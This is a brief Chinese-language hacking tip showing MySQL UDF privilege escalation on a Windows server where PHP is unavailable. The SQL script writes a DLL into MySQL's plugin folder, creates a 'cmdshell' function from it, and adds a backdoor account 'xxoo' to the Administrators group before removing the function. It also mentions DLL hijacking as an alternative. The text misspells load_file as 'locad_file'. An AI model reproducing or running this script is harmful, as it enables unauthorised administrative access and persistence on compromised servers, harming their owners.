当服务器不支持php时如何用UDF或者其他DLL提权

xxoo.sql

Use mysql;

Select locad_file("d:\\wwwroot\\test\\udf.dll")  into dumpfile 'd:\\mysql 5.1\\lib\\plugin\\xxoo.dll' ;


//如果是LPK.DLL劫持之类的下面就可以无视了

create function cmdshell returns string soname 'xxoo.dll';


select cmdshell('net user xxoo xxoo /add;net localgroup administrators xxoo /add');

drop function cmdshell;


然后上传www.atcpu.com mysql.exe 执行：


Mysql -u root -p pass < d:\\wwwroot\\test\\xxoo.sql